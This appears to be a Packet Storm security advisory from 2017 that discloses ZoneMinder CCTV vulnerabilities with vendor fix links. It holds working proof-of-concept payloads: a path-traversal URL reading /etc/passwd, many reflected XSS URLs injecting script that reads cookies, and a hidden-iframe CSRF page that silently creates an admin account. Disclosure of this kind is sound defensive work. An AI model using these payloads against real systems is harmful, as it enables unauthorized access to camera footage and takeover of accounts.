what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ZoneMinder XSS / CSRF / File Disclosure / Authentication Bypass

ZoneMinder XSS / CSRF / File Disclosure / Authentication Bypass
Posted Feb 6, 2017
Authored by John Marzella

Various ZoneMinder versions suffer from authentication bypass, cross site request forgery, cross site scripting, information disclosure, and file disclosure vulnerabilities.

tags | exploit, vulnerability, xss, info disclosure, csrf
advisories | CVE-2016-10140, CVE-2017-5367, CVE-2017-5368, CVE-2017-5595
SHA-256 | f68406098b52c99e74b1f00852c84f5caac953bfa36f870cdd77222ec5580f4d

ZoneMinder XSS / CSRF / File Disclosure / Authentication Bypass

Change Mirror Download
==========================================================================
Product: ZoneMinder
Versions: Multiple versions - see inline
Vulnerabilities: File disclosure, XSS, CSRF, Auth bypass & Info disclosure
CVE-IDs: CVE-2017-5595, CVE-2017-5367, CVE-2017-5368, CVE-2016-10140
Author: John Marzella
Date: 03/02/2017
==========================================================================



CVE-2016-10140 - Auth bypass and Info disclosure - affects v1.30 and v1.29
==========================================================================
Contacted vendor on 08/11/2016

Apache HTTP Server configuration bundled with ZoneMinder allows a remote unauthenticated attacker to browse all directories
in the web root, e.g., a remote unauthenticated attacker can view all CCTV images on the server.

PoC: http://<serverIP>/events

Fix: https://github.com/ZoneMinder/ZoneMinder/commit/71898df7565ed2a51dfe76a1cf30ddb81fc888ba



CVE-2017-5595 - File disclosure - affects v1.xx - code from 2008
================================================================
Contacted vendor on 22/01/2017

File disclosure and inclusion vulnerability exists in ZoneMinder v1.30.0 due to unfiltered user-input being passed to readfile() in views/file.php which allows an authenticated attacker to read local system files (e.g. /etc/passwd) in the context of the web server user (www-data).

PoC: http://<serverIP>/zm/index.php?view=file&path=/../../../../../etc/passwd

Fix: https://github.com/ZoneMinder/ZoneMinder/commit/8b19fca9927cdec07cc9dd09bdcf2496a5ae69b3



CVE-2017-5367 - XSS - affects v1.30 and v1.29
=============================================
Contacted vendor on 20/11/2016

Multiple reflected XSS exists.

The following has been injected into vulnerable URLas to show that the users session cookie can be stolen.
%3Cscript%3Ealert(document.cookie);%3C/script%3E

In form input view using POST at http://<serverIP>/zm/
PoC: http://<serverIP>/zm/index.php?action=login&view=postlogin%3Cscript%3Ealert(document.cookie);%3C/script%3E&postLoginQuery=1&username=testuser&password=testpassword

In link input view using GET at http://<serverIP>/zm/
PoC: http://<serverIP>/zm/?view=groups%3Cscript%3Ealert(document.cookie);%3C/script%3E

In link input filter[terms][1][cnj] using GET at http://<serverIP>/zm/
PoC: http://<serverIP>/zm/?view=events&page=1&filter[terms][0][attr]=DateTime&filter[terms][0][op]=%3E%3D&filter[terms][0][val]=-1%2Bhour&filter[terms][1][cnj]=and%3Cscript%3Ealert(document.cookie);%3C/script%3E&filter[terms][1][attr]=MonitorId&filter[terms][1][op]=%3D&filter[terms][1][val]=1

In form input view using GET at http://<serverIP>/zm/index.php
PoC: http://<serverIP>/zm/index.php?view=console%3Cscript%3Ealert(document.cookie);%3C/script%3E&action=1&addBtn=Add%20New%20Monitor&editBtn=Edit&deleteBtn=Delete&markMids[]=2

In form input filter[terms][1][cnj] using POST at http://<serverIP>/zm/index.php
PoC: http://<serverIP>/zm/index.php?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=Archived&filter%5Bterms%5D%5B0%5D%5Bop%5D=%3D&filter%5Bterms%5D%5B0%5D%5Bval%5D=1&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=and%3Cscript%3Ealert(document.cookie);%3C/script%3E&filter%5Bterms%5D%5B1%5D%5Battr%5D=MonitorId&filter%5Bterms%5D%5B1%5D%5Bop%5D=%3D&filter%5Bterms%5D%5B1%5D%5Bval%5D=1

In form input filter[terms][1][cnj] using POST at http://<serverIP>/zm/
PoC: http://<serverIP>/zm/?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=DateTime&filter%5Bterms%5D%5B0%5D%5Bop%5D=&filter%5Bterms%5D%5B0%5D%5Bval%5D=-1+hour&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=%3Cscript%3Ealert(document.cookie);%3C/script%3Eand&filter%5Bterms%5D%5B1%5D%5Battr%5D=MonitorId&filter%5Bterms%5D%5B1%5D%5Bop%5D==&filter%5Bterms%5D%5B1%5D%5Bval%5D=1

In form input limit using POST at http://<serverIP>/zm/index.php
PoC: http://<serverIP>/zm/index.php?view=events&action=1&page=1&filter[terms][0][attr]=DateTime&filter[terms][0][op]=%3E%3D&filter[terms][0][val]=-1%2Bmonth&sort_field=StartTime&sort_asc=1&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

In link input limit using GET at http://<serverIP>/zm/index.php
PoC: http://<serverIP>/zm/index.php?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=DateTime&filter%5Bterms%5D%5B0%5D%5Bop%5D=%3E%3D&filter%5Bterms%5D%5B0%5D%5Bval%5D=-1%2Bmonth&sort_field=Id&sort_asc=0&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

In form input limit using POST at http://<serverIP>/zm/
PoC: http://<serverIP>/zm/?view=events&action=1&page=1&sort_field=StartTime&sort_asc=1&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

In link input limit using GET at http://<serverIP>/zm/
PoC: http://<serverIP>/zm/?view=events&page=1&sort_field=Id&sort_asc=0&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E



CVE-2017-5368 - CSRF - affects v1.30 and v1.29
==============================================
Contacted vendor on 20/11/2016

No CSRF protection exists across entire web app.

PoC: The following html page silently adds a new admin user to Zoneminder if the admin user is already logged in.

csrf_poc_addUser.html

<!-- Example of silent CSRF using iframe -->
<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action="http://<serverIP>/zm/index.php" target="csrf-frame" id="csrf-form">
<input type="hidden" name="view" value="user"/>
<input type="hidden" name="action" value="user"/>
<input type="hidden" name="uid" value="0"/>
<input type="hidden" name="newUser[MonitorIds]" value=""/>
<input type="hidden" name="newUser[Username]" value="attacker1"/>
<input type="hidden" name="newUser[Password]" value="Password1234"/>
<input type="hidden" name="conf_password" value="Password1234"/>
<input type="hidden" name="newUser[Language]" value="en_gb"/>
<input type="hidden" name="newUser[Enabled]" value="1"/>
<input type="hidden" name="newUser[Stream]" value="View"/>
<input type="hidden" name="newUser[Events]" value="Edit"/>
<input type="hidden" name="newUser[Control]" value="Edit"/>
<input type="hidden" name="newUser[Monitors]" value="Edit"/>
<input type="hidden" name="newUser[Groups]" value="Edit"/>
<input type="hidden" name="newUser[System]" value="Edit"/>
<input type="hidden" name="newUser[MaxBandwidth]" value="high"/>
</form>
<script>document.getElementById("csrf-form").submit()</script>

Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close